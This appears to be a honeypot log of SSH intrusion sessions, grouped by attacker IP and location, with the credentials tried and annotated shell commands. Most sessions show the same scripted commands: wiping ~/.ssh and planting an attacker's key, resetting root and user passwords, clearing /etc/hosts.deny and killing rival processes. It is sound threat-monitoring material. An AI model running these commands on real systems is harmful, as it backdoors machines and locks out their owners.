$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "12345678\nNdGhO2bxTz1s\nNdGhO2bxTz1s"|passwd|bash
$ Enter new UNIX password:
$ echo "12345678\nNdGhO2bxTz1s\nNdGhO2bxTz1s\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:UvmDhoRVhcVq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 specter_root_35 (180.247.56.166) β€” Bekasi, Indonesia Β· 1 session Β· 20 cmds
2026-06-04 18:21 EDT Β· as john/12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345678\nHB4cqWWct4Z9\nHB4cqWWct4Z9"|passwd|bash
$ Enter new UNIX password:
$ echo "12345678\nHB4cqWWct4Z9\nHB4cqWWct4Z9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_36 (190.97.165.93) β€” Panama City, Panama Β· 1 session Β· 20 cmds
2026-06-04 17:46 EDT Β· as wow/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\n57giwzVAhLHx\n57giwzVAhLHx"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\n57giwzVAhLHx\n57giwzVAhLHx\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dutch_sol_4 (176.65.139.248) β€” Eygelshoven, The Netherlands Β· 2 sessions Β· 2 cmds
2026-06-04 16:17 EDT Β· as root/1qaz@WSX, server/root
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 specter_root_37 (223.197.178.95) β€” Central, Hong Kong Β· 1 session Β· 1 cmd
2026-06-04 16:46 EDT Β· as root/swissmp123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 monet_root (213.199.45.235) β€” Lauterbourg, France Β· 1 session Β· 19 cmds
2026-06-04 16:37 EDT Β· as root/Lky123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:DTfdAemR5o8O"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_7 (115.190.113.93) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-04 15:46 EDT Β· as ftpuser/123qweasd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123qweasd\nVnGmvSTmh2UR\nVnGmvSTmh2UR"|passwd|bash
$ Enter new UNIX password:
$ echo "123qweasd\nVnGmvSTmh2UR\nVnGmvSTmh2UR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bike_sol_6 (45.148.10.183) β€” Amsterdam, Netherlands Β· 1 session Β· 1 cmd
2026-06-04 15:38 EDT Β· as ubuntu/trader
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m // obfuscated system check
🎭 poutine_root_4 (141.109.168.108) β€” Calgary, Canada Β· 1 session Β· 20 cmds
2026-06-04 15:25 EDT Β· as keyvan/keyvan
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "keyvan\nIkohDEyGl6zp\nIkohDEyGl6zp"|passwd|bash
$ Enter new UNIX password:
$ echo "keyvan\nIkohDEyGl6zp\nIkohDEyGl6zp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira (201.71.192.108) β€” JoviΓ’nia, Brazil Β· 1 session Β· 20 cmds
2026-06-04 15:18 EDT Β· as ops/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nFe7hLoXKbibo\nFe7hLoXKbibo"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nFe7hLoXKbibo\nFe7hLoXKbibo\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tsar_root_2 (188.92.241.148) β€” Moscow, Russia Β· 1 session Β· 19 cmds
2026-06-04 15:15 EDT Β· as root/12345678Ab
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:nc7yIwS9dc8c"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_root_3 (45.156.87.34) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-06-04 14:58 EDT Β· as server/root
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 bike_root_9 (176.65.148.108) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-06-04 12:50 EDT Β· as root/binnnnnnnnnnnnnnnnnnnnnnnn
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 cowboy_root_21 (69.74.29.21) β€” New York, United States Β· 3 sessions Β· 58 cmds
2026-05-30 11:03 EDT Β· as alex/123qweasd, root/1q2w3e4r, root/Dev@1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:MP06gbhXpOtD"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123qweasd\ncwOnchOSeVX2\ncwOnchOSeVX2"|passwd|bash
$ Enter new UNIX password:
$ echo "123qweasd\ncwOnchOSeVX2\ncwOnchOSeVX2\n"|passwd
$ echo "root:J3ppCc6STnxf"|chpasswd|bash
🎭 cowboy_root_22 (43.162.99.8) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-06-04 13:35 EDT Β· as root/Dev@1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:C8owRUxaEoPE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_5 (38.253.239.21) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-06-04 11:08 EDT Β· as mca/mca123
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mca123\nfAj0vIGP149u\nfAj0vIGP149u"|passwd|bash
$ Enter new UNIX password:
$ echo "mca123\nfAj0vIGP149u\nfAj0vIGP149u\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_34 (118.26.37.26) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-06-04 10:42 EDT Β· as hieu/123456
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nl1PduOlIlfq7\nl1PduOlIlfq7"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nl1PduOlIlfq7\nl1PduOlIlfq7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_sol (31.179.197.26) β€” Krakow, Poland Β· 1 session Β· 20 cmds
2026-06-04 10:32 EDT Β· as sql/123
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nF2Ncpi08ZRWZ\nF2Ncpi08ZRWZ"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nF2Ncpi08ZRWZ\nF2Ncpi08ZRWZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_21 (154.83.16.14) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 40 cmds
2026-05-30 23:41 EDT Β· as color/color123, ts3server/1
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "color123\n6SO0OS46oYsJ\n6SO0OS46oYsJ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "color123\n6SO0OS46oYsJ\n6SO0OS46oYsJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
